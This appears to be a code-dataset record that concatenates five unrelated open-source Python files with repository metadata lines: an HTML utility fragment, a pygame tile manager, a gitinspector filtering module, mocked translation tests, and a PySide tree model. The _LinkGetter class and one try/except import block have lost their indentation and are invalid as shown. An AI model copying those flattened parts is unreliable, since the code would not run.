        disabled = [disabled]
    # PHP-style convention: multiple selects submit as 'name[]'.
    if name is not None and multiple and not name.endswith('[]'):
        name += "[]"
    if isinstance(options, dict):
        items = options.items()
        # Sort by displayed value (Python 2 cmp-style in-place sort).
        items.sort(lambda item1, item2: cmp(item1[1], item2[1]))
    elif isinstance(options, (list, tuple)):
        options = list(options)
        items = []
        for item in options:
            if isinstance(item, (str, unicode)):
                # Bare string: used both as value and as label.
                items.append((item, item))
            elif isinstance(item, (tuple, list)) and len(item) == 2:
                items.append(tuple(item))
            else:
                raise ValueError('Item "%s" of incompatible type: %s' % (item, type(item)))
    else:
        raise ValueError('Options of incompatible type: %s' % type(options))
    for key, value in items:
        option_attrs = {}
        if key in selected:
            option_attrs['selected'] = 'selected'
        if key in disabled:
            option_attrs['disabled'] = 'disabled'
        body.append(create_tag("option", body=value, escape_body=True, value=key, attrs=option_attrs))
    if attrs is None:
        attrs = {}
    if name is not None:
        attrs['name'] = name
    if multiple:
        attrs['multiple'] = 'multiple'
    return create_tag("select", body='\n'.join(body), attrs=attrs, **other_attrs)
class _LinkGetter(HTMLParser):
"""
Hidden class that, by deriving from HTMLParser, will intercept all
<a> tags and retrieve the corresponding href attribute.
All URLs are available in the urls attribute of the class.
"""
def __init__(self):
HTMLParser.__init__(self)
self.urls = set()
def handle_starttag(self, tag, attrs):
if tag == 'a':
for (name, value) in attrs:
if name == 'href':
self.urls.add(value)
def get_links_in_html_page(html):
    """
    Return the set of URLs referenced via <a href="..."> tags.

    @param html: the HTML text to parse
    @type html: str
    @return: the list of URLs that were referenced via <a> tags.
    @rtype: set of str
    """
    link_getter = _LinkGetter()
    link_getter.feed(html)
    return link_getter.urls
| Dziolas/invenio | modules/miscutil/lib/htmlutils.py | Python | gpl-2.0 | 37,499 | 0.004293 |
import math, os
import pygame
import thorpy
has_surfarray = False
try:
from PyWorld2D.rendering.tilers.beachtiler import BeachTiler
from PyWorld2D.rendering.tilers.basetiler import BaseTiler
from PyWorld2D.rendering.tilers.roundtiler import RoundTiler
from PyWorld2D.rendering.tilers.loadtiler import LoadTiler
has_surfarray = True
except:
from PyWorld2D.rendering.tilers.loadtiler import LoadTiler
def get_mixed_tiles(img1, img2, alpha_img_2):
    """Return a copy of img1 with img2 blended on top at the given alpha.

    Neither input surface is modified: both are copied before use.
    """
    base = img1.copy()
    overlay = img2.copy()
    overlay.set_alpha(alpha_img_2)
    base.blit(overlay, (0, 0))
    return base
##def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
## w, h = img.get_size()
## s = pygame.Surface((2*w,2*h))
## s.blit(img, (0,0))
## s.blit(img, (w,0))
## s.blit(img, (0,h))
## s.blit(img, (w,h))
## #now we just have to take slices
## images = []
## for i in range(nframes):
## if sin:
## delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
## delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
## else:
## delta_x = i*dx
## delta_y = i*dy
## result = pygame.Surface((w,h))
## result.blit(s,(delta_x-w//2,delta_y-h//2))
## images.append(result)
## if reverse:
## images += images[::-1][1:-1]
## return images
def get_shifted_tiles(img, nframes, dx=0, dy=0, reverse=False, sin=True):
    """Build *nframes* frames of ``img`` shifted by (dx, dy) per frame.

    The image is blitted four times, wrapped on both axes, so each shifted
    frame tiles seamlessly.  With ``sin`` the shift oscillates sinusoidally
    over the animation cycle, otherwise it grows linearly per frame.  With
    ``reverse`` the frames (minus the two endpoint frames) are mirrored and
    appended to produce a back-and-forth loop.
    """
    r = img.get_rect()
    w,h = r.size
    images = []
    for i in range(nframes):
        if sin:
            delta_x = dx*math.sin(2.*math.pi*i/float(nframes))
            delta_y = dy*math.sin(2.*math.pi*i/float(nframes))
        else:
            delta_x = i*dx
            delta_y = i*dy
##        print(delta_x,w)
##        assert abs(delta_x) <= w
##        assert abs(delta_y) <= h
        result = pygame.Surface(r.size)
        # Wrap direction depends on the sign of the shift, so the extra
        # copies always cover the hole left by the displaced image.
        xsgn, ysgn = 1, 1
        if delta_x>0:
            xsgn = -1
        if delta_y>0:
            ysgn = -1
        result.blit(img,r.move(delta_x,delta_y))
        result.blit(img,r.move(delta_x,delta_y+ysgn*h))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y))
        result.blit(img,r.move(delta_x+xsgn*w,delta_y+ysgn*h))
        images.append(result)
    if reverse:
        # Mirror the animation (endpoints excluded to avoid duplicates).
        images += images[::-1][1:-1]
    return images
def build_tiles(img_fullsize, sizes, nframes, dx_divider=0, dy_divider=0,
                reverse=False, sin=True, colorkey=None):
    """Returns a list of list of images on the form : imgs[size][frame]

    img_fullsize -- source surface, smooth-scaled down to each size.
    dx_divider/dy_divider -- per-frame shift is size/divider (0 disables
    shifting along that axis).
    colorkey -- if given, set as colorkey on every generated frame.
    """
    imgs = []
    for size in sizes:
        #smoothscale is important here, otherwise FAST should be always True
        img = pygame.transform.smoothscale(img_fullsize, (size,)*2)
        dx = 0
        if dx_divider:
            dx = int(size/dx_divider)
        dy = 0
        if dy_divider:
            dy = int(size/dy_divider)
        imgs.append(get_shifted_tiles(img, nframes, dx, dy, reverse, sin))
    if colorkey:
        for tiles in imgs:
            for img in tiles:
                img.set_colorkey(colorkey)
    return imgs
def build_color_tiles(color, sizes, nframes, reverse=False, sin=True):
    """Build animation frames of solid-color tiles, one frame list per size."""
    frames_per_size = []
    for tile_size in sizes:
        tile = pygame.Surface((tile_size,) * 2)
        tile.fill(color)
        frames_per_size.append(get_shifted_tiles(tile, nframes, 0, 0, reverse, sin))
    return frames_per_size
def get_radiuses(nframes, initial_value, increment, reverse=False, sin=True):
    """Return one integer radius per frame.

    In sinusoidal mode the radius oscillates around ``initial_value``;
    otherwise it grows linearly by ``increment`` per frame starting from
    zero.  When ``reverse`` is set, the list is replaced by its reversal
    with the first and last entries dropped (original behaviour kept).
    """
    current = initial_value if sin else 0
    radiuses = []
    for frame in range(nframes):
        if sin:
            current += increment * math.sin(2. * math.pi * frame / float(nframes))
        else:
            current += increment
        radiuses.append(int(current))
    if reverse:
        radiuses = radiuses[::-1][1:-1]
    return radiuses
def build_tilers(grasses, waters, radius_divider, use_beach_tiler):
    """Build one tiler per (zoom level, frame) pair.

    ``grasses``/``waters`` are indexed as imgs[zoom][frame] and must have
    matching zoom and frame counts.  With ``use_beach_tiler`` a BeachTiler
    (grass/water transition) is built with rounded corners of radius
    cell_size//radius_divider, otherwise a plain BaseTiler with radius 0.
    Returns tilers[zoom][frame].
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        for n in range(nframes):
            if use_beach_tiler:
                tiler = BeachTiler(grasses[z][n], waters[z][n])
                tiler.make(size=(cell_size,)*2, radius=radius)
            else:
                tiler = BaseTiler(grasses[z][n])
                tiler.make(size=(cell_size,)*2, radius=0)
            tilers[z][n] = tiler
    return tilers
def build_static_tilers(grasses, waters, radius_divider, use_beach_tiler):
    """Build one tiler per zoom level and reuse it for every frame.

    Same contract as build_tilers(), but since static materials do not
    animate, only frame 0 is rendered and shared across all frame slots.
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom):
        cell_size = grasses[z][0].get_width()
        radius = cell_size//radius_divider
        if use_beach_tiler:
            tiler = BeachTiler(grasses[z][0], waters[z][0])
            tiler.make(size=(cell_size,)*2, radius=radius)
        else:
            tiler = BaseTiler(grasses[z][0])
            tiler.make(size=(cell_size,)*2, radius=0)
        # Share the single rendered tiler across every frame slot.
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers
def build_tilers_fast(grasses, waters, radius_divider, use_beach_tiler):
    """Build full tilers only at zoom 0, then derive the other zoom levels
    by scaling the zoom-0 images.

    Faster than build_tilers() (one real render per frame instead of one
    per zoom and frame) at the cost of scaling quality.
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    cell_size = grasses[0][0].get_width()
    radius = cell_size//radius_divider
    # Real rendering pass: zoom level 0 only.
    for n in range(nframes):
        if use_beach_tiler:
            tiler = BeachTiler(grasses[0][n], waters[0][n])
            tiler.make(size=(cell_size,)*2, radius=radius)
        else:
            tiler = BaseTiler(grasses[0][n])
            tiler.make(size=(cell_size,)*2, radius=0)
        tilers[0][n] = tiler
    if nzoom > 1:
        # Derived pass: scale zoom-0 images down for every other zoom level.
        for z in range(1,nzoom):
            for n in range(nframes):
                if use_beach_tiler:
                    tiler = BeachTiler(grasses[z][n], waters[z][n])
                else:
                    tiler = BaseTiler(grasses[z][n])
                size = grasses[z][n].get_size()
                ref = tilers[0][n]
                for key in ref.imgs:
                    tiler.imgs[key] = pygame.transform.scale(ref.imgs[key], size)
                tilers[z][n] = tiler
    return tilers
def load_tilers_dynamic(i, grasses, waters, folder):  # for static materials, nframes == 1
    """Load pre-rendered tiler images for an animated material couple.

    ``i`` is the material-couple index used in the cached file names
    ("<i>_<frame>_..." inside *folder*).  Returns tilers[zoom][frame].
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom): # NOTE: could be optimized a lot, since each image could be loaded once instead of z times
        cell_size = grasses[z][0].get_width()
        for n in range(nframes):
            basename = os.path.join(folder,str(i)+"_"+str(n)+"_")
            tilers[z][n] = LoadTiler(basename, (cell_size,)*2)
    return tilers
def load_tilers_static(i, grasses, waters, folder):  # for static materials, nframes == 1
    """Load pre-rendered tiler images for a static material couple.

    Only frame 0 is loaded per zoom level and shared across all frame
    slots.  Returns tilers[zoom][frame].
    """
    nzoom = len(grasses)
    assert nzoom == len(waters) #same number of zoom levels
    nframes = len(grasses[0])
    for z in range(nzoom):
        assert nframes == len(waters[z]) #same number of frames
    tilers = [[None for n in range(nframes)] for z in range(nzoom)]
    for z in range(nzoom): # NOTE: could be optimized a lot, since each image could be loaded once instead of z times
        cell_size = grasses[z][0].get_width()
        basename = os.path.join(folder,str(i)+"_"+str(0)+"_")
        tiler = LoadTiler(basename, (cell_size,)*2)
        # Share the single loaded tiler across every frame slot.
        for n in range(nframes):
            tilers[z][n] = tiler
    return tilers
def get_material_couples(materials, radius_divider, fast, use_beach_tiler,
                            load_tilers):
    """Sort materials by height threshold and build one MaterialCouple for
    each pair of height-adjacent materials.

    All materials must share the same frame count (asserted below).
    Returns the couples ordered by increasing height.
    """
    materials.sort(key=lambda x:x.hmax)
    couples = []
    imgs_zoom0_mat0 = materials[0].imgs[0]
    nframes = len(imgs_zoom0_mat0)
    max_cell_size = imgs_zoom0_mat0[0].get_width()
    for i in range(len(materials)-1):
        print(" Building tilers for couple", i)
        assert nframes == len(materials[i+1].imgs[0])
        couple = MaterialCouple(i, materials[i], materials[i+1], radius_divider,
                                max_cell_size, fast, use_beach_tiler, load_tilers)
        couples.append(couple)
    return couples
def get_couple(h, couples):
    """Return the material couple responsible for height ``h``.

    Negative heights map to the first couple; heights above every grass
    threshold map to the last one.
    """
    if h < 0.:
        return couples[0]
    for candidate in couples:
        if candidate.grass.hmax > h:
            return candidate
    return couples[-1]
class Material:
    """Plain data holder describing one terrain material.

    Attributes:
        name   -- display name of the material.
        hmax   -- height threshold associated with this material.
        imgs   -- per-zoom lists of animation frames.
        static -- True when the material is not animated.
    """

    def __init__(self, name, hmax, imgs, static):
        self.name = name
        self.hmax = hmax
        self.imgs = imgs
        self.static = static
class MaterialCouple:
    """Pairs two height-adjacent materials and owns the tilers that draw
    their transition.

    The material with the greater ``hmax`` plays the role of "grass", the
    other one "water"; ``transition`` is the water height threshold.
    """

    def __init__(self, i, material1, material2, radius_divider, max_cell_size,
                 fast, use_beach_tiler, load_tilers):
        # Building tilers needs pygame.surfarray (numpy); loading
        # pre-rendered ones does not.
        if not has_surfarray and not load_tilers:
            raise Exception("Numpy was not found, and tilers are not loaded")
        assert material1.hmax != material2.hmax
        if material1.hmax > material2.hmax:
            self.grass, self.water = material1, material2
        else:
            self.grass, self.water = material2, material1
        #
        if load_tilers:
            # load_tilers is the folder containing pre-rendered tile images.
            if material1.static and material2.static:
                self.static = True
                self.tilers = load_tilers_static(i, self.grass.imgs, self.water.imgs, load_tilers)
            else:
                self.static = False
                self.tilers = load_tilers_dynamic(i, self.grass.imgs, self.water.imgs, load_tilers)
        else:
            build_tilers_static = build_static_tilers
            if fast:
                build_tilers_dynamic = build_tilers_fast
            else:
                build_tilers_dynamic = build_tilers
            if material1.static and material2.static:
                self.static = True
                self.tilers = build_tilers_static(self.grass.imgs, self.water.imgs,
                                                    radius_divider, use_beach_tiler)
            else:
                self.static = False
                self.tilers = build_tilers_dynamic(self.grass.imgs, self.water.imgs,
                                                    radius_divider, use_beach_tiler)
        self.transition = self.water.hmax
        self.max_cell_size = max_cell_size

    def get_tilers(self, zoom):
        """Return the list of per-frame tilers for *zoom*."""
        return self.tilers[zoom]

    def get_cell_size(self, zoom):
        """Pixel size of one cell at *zoom* (width of the "c" image)."""
        return self.tilers[zoom][0].imgs["c"].get_width()

    def get_all_frames(self, zoom, type_):
        """Return the *type_* image of every frame at *zoom*."""
        return [self.tilers[zoom][t].imgs[type_] for t in range(len(self.tilers[zoom]))]
| YannThorimbert/PyWorld2D | rendering/tilers/tilemanager.py | Python | mit | 11,093 | 0.009015 |
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import re
import textwrap
from gitinspector.localization import N_
from gitinspector.outputable import Outputable
from gitinspector import terminal
# Maps filter type -> [list of configured regex patterns, set of matched entries].
__filters__ = {"file": [[], set()], "author": [[], set()], "email": [[], set()]}
class InvalidRegExpError(ValueError):
    """Raised when a user-supplied filter is not a valid regular expression."""

    def __init__(self, msg):
        super(InvalidRegExpError, self).__init__(msg)
        # Kept as an attribute so callers can show the message directly.
        self.msg = msg
def get():
    """Return the module-wide filter table: type -> [patterns, matched set]."""
    return __filters__
def __add_one__(string):
    """Register a single filter rule.

    A rule of the form "<type>:<pattern>" (e.g. "author:John") is stored
    under that filter type; anything else is treated as a file pattern.
    """
    for i in __filters__:
        if (i + ":").lower() == string[0:len(i) + 1].lower():
            __filters__[i][0].append(string[len(i) + 1:])
            return
    __filters__["file"][0].append(string)
def add(string):
    """Register one or more comma-separated filter rules."""
    rules = string.split(",")
    for rule in rules:
        __add_one__(rule)
def clear():
    """Drop every configured filter pattern (already-matched sets are kept)."""
    for i in __filters__:
        __filters__[i][0] = []
def get_filered(filter_type="file"):
    """Return the set of entries matched by filters of *filter_type*.

    NOTE(review): the name looks like a typo of ``get_filtered``; kept
    unchanged for backward compatibility with existing callers.
    """
    return __filters__[filter_type][1]
def has_filtered():
    """Return True when at least one entry has been filtered out."""
    return any(__filters__[filter_type][1] for filter_type in __filters__)
def set_filtered(string, filter_type="file"):
    """Record *string* if it matches any configured *filter_type* pattern.

    Returns True when the string was filtered (recorded in the matched
    set), False otherwise.  Raises InvalidRegExpError when a configured
    pattern is not a valid regular expression.
    """
    string = string.strip()
    if len(string) > 0:
        for i in __filters__[filter_type][0]:
            try:
                match = re.search(i, string)
            except re.error:
                # Only trap regex compilation errors; the previous bare
                # "except:" also swallowed KeyboardInterrupt and unrelated
                # bugs and re-labelled them as invalid regular expressions.
                raise InvalidRegExpError(_("invalid regular expression specified"))
            if match is not None:
                __filters__[filter_type][1].add(string)
                return True
    return False
# User-facing section headings; N_() only marks them for translation
# extraction, the actual translation happens via _() at output time.
FILTERING_INFO_TEXT = N_(
    "The following files were excluded from the statistics due to the specified exclusion patterns")
FILTERING_AUTHOR_INFO_TEXT = N_(
    "The following authors were excluded from the statistics due to the specified exclusion patterns")
FILTERING_EMAIL_INFO_TEXT = N_(
    "The authors with the following emails were excluded from the statistics due to the specified exclusion patterns")
class Filtering(Outputable):
    """Reports, in text/HTML/XML form, the files, authors and emails that
    were excluded from the statistics by the exclusion patterns."""

    @staticmethod
    def __output_html_section__(info_string, filtered):
        filtering_xml = ""

        if filtered:
            filtering_xml += "<p>" + info_string + "." + "</p>"

            for i in filtered:
                filtering_xml += "<p>" + i + "</p>"

        return filtering_xml

    def output_html(self):
        if has_filtered():
            filtering_xml = "<div><div class=\"box\">"
            # Bug fix: the section strings were previously computed but never
            # appended, so the HTML report showed an empty filtering box.
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
            filtering_xml += Filtering.__output_html_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])
            filtering_xml += "</div></div>"

            print(filtering_xml)

    @staticmethod
    def __output_text_section__(info_string, filtered):
        if filtered:
            print("\n" + textwrap.fill(info_string + ":", width=terminal.get_size()[0]))

            for i in filtered:
                # Truncate from the left so the most specific path part stays visible.
                (width, _unused) = terminal.get_size()
                print("...%s" % i[-width + 3:] if len(i) > width else i)

    def output_text(self):
        Filtering.__output_text_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1])
        Filtering.__output_text_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1])
        Filtering.__output_text_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1])

    @staticmethod
    def __output_xml_section__(info_string, filtered, container_tagname):
        if filtered:
            message_xml = "\t\t\t<message>" + info_string + "</message>\n"
            filtering_xml = ""

            for i in filtered:
                # The former .format(container_tagname) calls had no
                # placeholders and were no-ops; the markup is a plain literal.
                filtering_xml += "\t\t\t\t<entry>" + i + "</entry>\n"

            print("\t\t<{0}>".format(container_tagname))
            print(message_xml + "\t\t\t<entries>\n" + filtering_xml + "\t\t\t</entries>\n")
            print("\t\t</{0}>".format(container_tagname))

    def output_xml(self):
        if has_filtered():
            print("\t<filtering>")
            Filtering.__output_xml_section__(_(FILTERING_INFO_TEXT), __filters__["file"][1], "files")
            Filtering.__output_xml_section__(_(FILTERING_AUTHOR_INFO_TEXT), __filters__["author"][1], "authors")
            Filtering.__output_xml_section__(_(FILTERING_EMAIL_INFO_TEXT), __filters__["email"][1], "emails")
            print("\t</filtering>")
| vpol/gitinspector | gitinspector/filtering.py | Python | gpl-3.0 | 5,218 | 0.003642 |
# -*- coding: utf-8 -*-
import os
from mock import Mock, patch
from maidchan.translate import get_trans_language_prediction, get_translation
SCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))
def _get_response(name):
    """Read a canned response file from the test data directory as utf-8 bytes."""
    with open(os.path.join(SCRIPT_PATH, 'data', name)) as f:
        return f.read().encode("utf-8")
def mocked_trans(*args, **kwargs):
    """
    Mocked "trans"

    Returns a Mock whose ``communicate()`` yields the canned fixture that
    matches the command line the real "trans" binary would receive.
    ``args[0]`` is the argv list passed to subprocess.Popen.
    """
    process_mock = Mock()
    return_value = None
    # Language prediction request (-id flag).
    if '-id' in args[0] and 'hello, world!' in args[0]:
        return_value = _get_response('get_trans_prediction.txt')
    # Brief translation (-b) English -> Japanese.
    elif '-b' in args[0] and 'en:ja' in args[0] and 'hello, world!' in args[0]:
        return_value = _get_response('get_trans_translation.txt')
    # Brief translation (-b) English -> Indonesian.
    elif '-b' in args[0] and 'en:id' in args[0] and 'hello, world!' in args[0]:
        return_value = _get_response('get_trans_translation_2.txt')
    attrs = {'communicate.return_value': (return_value, None)}
    process_mock.configure_mock(**attrs)
    return process_mock
class TestTranslate:
    """Unit tests for the translation helpers, with subprocess.Popen mocked
    out so no real "trans" binary is needed."""

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translate_language_prediction(self, mock_trans):
        # The fixture predicts English for "hello, world!".
        assert get_trans_language_prediction("hello, world!") == "en"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_en_to_ja(self, mock_trans):
        query = "translate hello, world! from english to japanese"
        assert get_translation(query) == "こんにちは世界!"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_en_to_default(self, mock_trans):
        # No target language given: the default target is used (Japanese fixture).
        query = "translate hello, world! from english"
        assert get_translation(query) == "こんにちは世界!"

    @patch('subprocess.Popen', side_effect=mocked_trans)
    def test_get_translation_default_to_id(self, mock_trans):
        # No source language given: the source is auto-detected.
        query = "translate hello, world! to bahasa"
        assert get_translation(query) == "Halo Dunia!"
| freedomofkeima/messenger-maid-chan | tests/test_translate.py | Python | mit | 1,946 | 0 |
#from PySide import QtGui, QtCore
#from cube_list import CubeItem, RootItem
#
#class TreeModel(QtGui.QStandardItemModel):
# def __init__(self, rows, columns, contCubes, indCubes, parent = None):
# super(TreeModel, self).__init__(rows, columns, parent)
# self.contCubes = contCubes
# self.indCubes = indCubes
#
## self.rootItem = CubeItem()
#
# def flags(self, index):
# if index.parent() == QtCore.QModelIndex():
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
# if index.column() == 1 or index.column() == 2:
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
#
#
# return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
#
# def setData(self, index, value, role=QtCore.Qt.EditRole):
# if role != QtCore.Qt.EditRole:
# return False
# variant = value
# if index.column() == 0:
# value = str(value.toString())
#
# if index.row() == 0:
# self.contCubes.setName(value, index.row())
# if index.row() == 1: #index.parent.row()==1
# self.indCubes.setName(value, index.row())
#
# result = True
#
# if index.column() == 3:
# value = int(value)
#
# if index.row() == 0:
# self.contCubes.changeUndefValue(value, index.row())
# if index.row() == 1:
# self.indCubes.changeUndefValue(value, index.row())
#
# result = True
#
# if result:
# self.dataChanged.emit(index, index)
# return result
from PySide import QtCore, QtGui
class TreeItem(object):
    """One node of a generic tree: a list of per-column values plus an
    ordered list of child nodes.  Used as backing storage for TreeModel."""

    def __init__(self, data, parent=None):
        self.parentItem = parent
        self.itemData = data
        self.childItems = []

    def child(self, row):
        """Return the child node at position *row*."""
        return self.childItems[row]

    def childCount(self):
        return len(self.childItems)

    def childNumber(self):
        """Return this node's index within its parent (0 for the root)."""
        if self.parentItem is not None:
            return self.parentItem.childItems.index(self)
        return 0

    def columnCount(self):
        return len(self.itemData)

    def data(self, column):
        return self.itemData[column]

    def insertChildren(self, position, count, columns):
        """Insert *count* empty children (each with *columns* None values)."""
        if not 0 <= position <= len(self.childItems):
            return False
        for _ in range(count):
            self.childItems.insert(position, TreeItem([None] * columns, self))
        return True

    def insertColumns(self, position, columns):
        """Insert empty columns here and, recursively, in every child."""
        if not 0 <= position <= len(self.itemData):
            return False
        for _ in range(columns):
            self.itemData.insert(position, None)
        for child in self.childItems:
            child.insertColumns(position, columns)
        return True

    def parent(self):
        return self.parentItem

    def removeChildren(self, position, count):
        if position < 0 or position + count > len(self.childItems):
            return False
        for _ in range(count):
            self.childItems.pop(position)
        return True

    def removeColumns(self, position, columns):
        """Remove columns here and, recursively, in every child."""
        if position < 0 or position + columns > len(self.itemData):
            return False
        for _ in range(columns):
            self.itemData.pop(position)
        for child in self.childItems:
            child.removeColumns(position, columns)
        return True

    def setData(self, column, value):
        if not 0 <= column < len(self.itemData):
            return False
        self.itemData[column] = value
        return True
class TreeModel(QtCore.QAbstractItemModel):
    """Two-level Qt tree model over the cube collections.

    Row 0 of the root holds continuous cubes, row 1 holds indicator cubes
    (see the icon selection in data()).  Edits to column 0 (name) and
    column 3 (undefined value) are forwarded to the matching collection.
    """

    def __init__(self, headers, contCubes, indCubes, parent=None):
        super(TreeModel, self).__init__(parent)

        self.contCubes = contCubes
        self.indCubes = indCubes

        rootData = [header for header in headers]
        self.rootItem = TreeItem(rootData)
# self.setupModelData(data.split("\n"), self.rootItem)

    def columnCount(self, parent=QtCore.QModelIndex()):
        # Every row shares the root's column count.
        return self.rootItem.columnCount()

    def data(self, index, role):
        """Return display/edit text, or a 22x22 icon for the category rows."""
        if not index.isValid():
            return None

        if role == QtCore.Qt.DecorationRole:
            # Only the two top-level category rows get an icon.
            if self.getItem(index).parent() == self.rootItem:
                if index.column() == 0:
                    if index.row() == 0:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/cont.png')
                        pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                              transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap
                    if index.row() == 1:
                        pixmap = QtGui.QPixmap()
                        pixmap.load(':/icons/ind.png')
                        pixmap = pixmap.scaled(22, 22, aspectRatioMode=QtCore.Qt.KeepAspectRatio,
                                              transformMode=QtCore.Qt.SmoothTransformation)
                        return pixmap

        if role == QtCore.Qt.DisplayRole or role == QtCore.Qt.EditRole:
            item = self.getItem(index)
            return item.data(index.column())

        return None

    def flags(self, index):
        # Category rows are selectable only; columns 1-2 of cube rows are
        # read-only; every other cell is editable.
        parentItem = self.getItem(index).parent()
        if parentItem == self.rootItem:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable

        if index.column() == 1 or index.column() == 2:
            return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable

        return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable

    def getItem(self, index):
        """Return the TreeItem behind *index* (root item for invalid indexes)."""
        if index.isValid():
            item = index.internalPointer()
            if item:
                return item

        return self.rootItem

    def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return self.rootItem.data(section)

        return None

    def index(self, row, column, parent=QtCore.QModelIndex()):
        # Children hang off column 0 only (standard tree-model convention).
        if parent.isValid() and parent.column() != 0:
            return QtCore.QModelIndex()

        parentItem = self.getItem(parent)
        childItem = parentItem.child(row)
        if childItem:
            return self.createIndex(row, column, childItem)
        else:
            return QtCore.QModelIndex()

    def insertColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginInsertColumns(parent, position, position + columns - 1)
        success = self.rootItem.insertColumns(position, columns)
        self.endInsertColumns()

        return success

    def insertRows(self, position, rows, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        self.beginInsertRows(parent, position, position + rows - 1)
        success = parentItem.insertChildren(position, rows,
                self.rootItem.columnCount())
        self.endInsertRows()

        return success

    def parent(self, index):
        if not index.isValid():
            return QtCore.QModelIndex()

        childItem = self.getItem(index)
        parentItem = childItem.parent()

        if parentItem == self.rootItem:
            return QtCore.QModelIndex()

        return self.createIndex(parentItem.childNumber(), 0, parentItem)

    def removeColumns(self, position, columns, parent=QtCore.QModelIndex()):
        self.beginRemoveColumns(parent, position, position + columns - 1)
        success = self.rootItem.removeColumns(position, columns)
        self.endRemoveColumns()

        # No columns left means no meaningful rows either.
        if self.rootItem.columnCount() == 0:
            self.removeRows(0, self.rowCount())

        return success

    def removeRows(self, position, rows, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)

        self.beginRemoveRows(parent, position, position + rows - 1)
        success = parentItem.removeChildren(position, rows)
        self.endRemoveRows()

        return success

    def rowCount(self, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)

        return parentItem.childCount()

    def setData(self, index, value, role=QtCore.Qt.EditRole):
        #print index.row(), index.column()
        if role != QtCore.Qt.EditRole:
            return False
        item = self.getItem(index)
        try:
            result = item.setData(index.column(), value)
            if index.column() == 0:
                # Column 0 is the cube name: forward it to the owning
                # collection (parent row 0 = continuous, row 1 = indicator).
                value = str(value.toString())
                if index.parent().row() == 0:
                    self.contCubes.setName(value, index.row())
                if index.parent().row() == 1:
                    self.indCubes.setName(value, index.row())
                result = True
            if index.column() == 3:
                # Column 3 is the undefined-value marker, stored as int.
                value = int(value)
                print 'Yeap, i am here, value=', value
                if index.parent().row() == 0:
                    self.contCubes.changeUndefValue(value, index.row())
                if index.parent().row() == 1:
                    self.indCubes.changeUndefValue(value, index.row())
                result = True
        except:
            # NOTE(review): this bare except silently swallows conversion and
            # model errors; narrowing it (e.g. ValueError) would aid debugging.
            result = False
        if result:
            self.dataChanged.emit(index, index)
        return result

    def setHeaderData(self, section, orientation, value, role=QtCore.Qt.EditRole):
        if role != QtCore.Qt.EditRole or orientation != QtCore.Qt.Horizontal:
            return False

        result = self.rootItem.setData(section, value)
        if result:
            self.headerDataChanged.emit(orientation, section, section)

        return result
#class MainWindow(QtGui.QWidget):
# def __init__(self, parent = None):
# QtGui.QWidget.__init__(self, parent)
#
# header = ['1', '2', '3']
# model = TreeModel(header)
#
# self.tree = QtGui.QTreeView()
# self.tree.setModel(model)
#
# vbox = QtGui.QVBoxLayout()
# self.setLayout(vbox)
# vbox.addWidget(self.tree)
#
# self.insertRow(['1', '2', '3'])
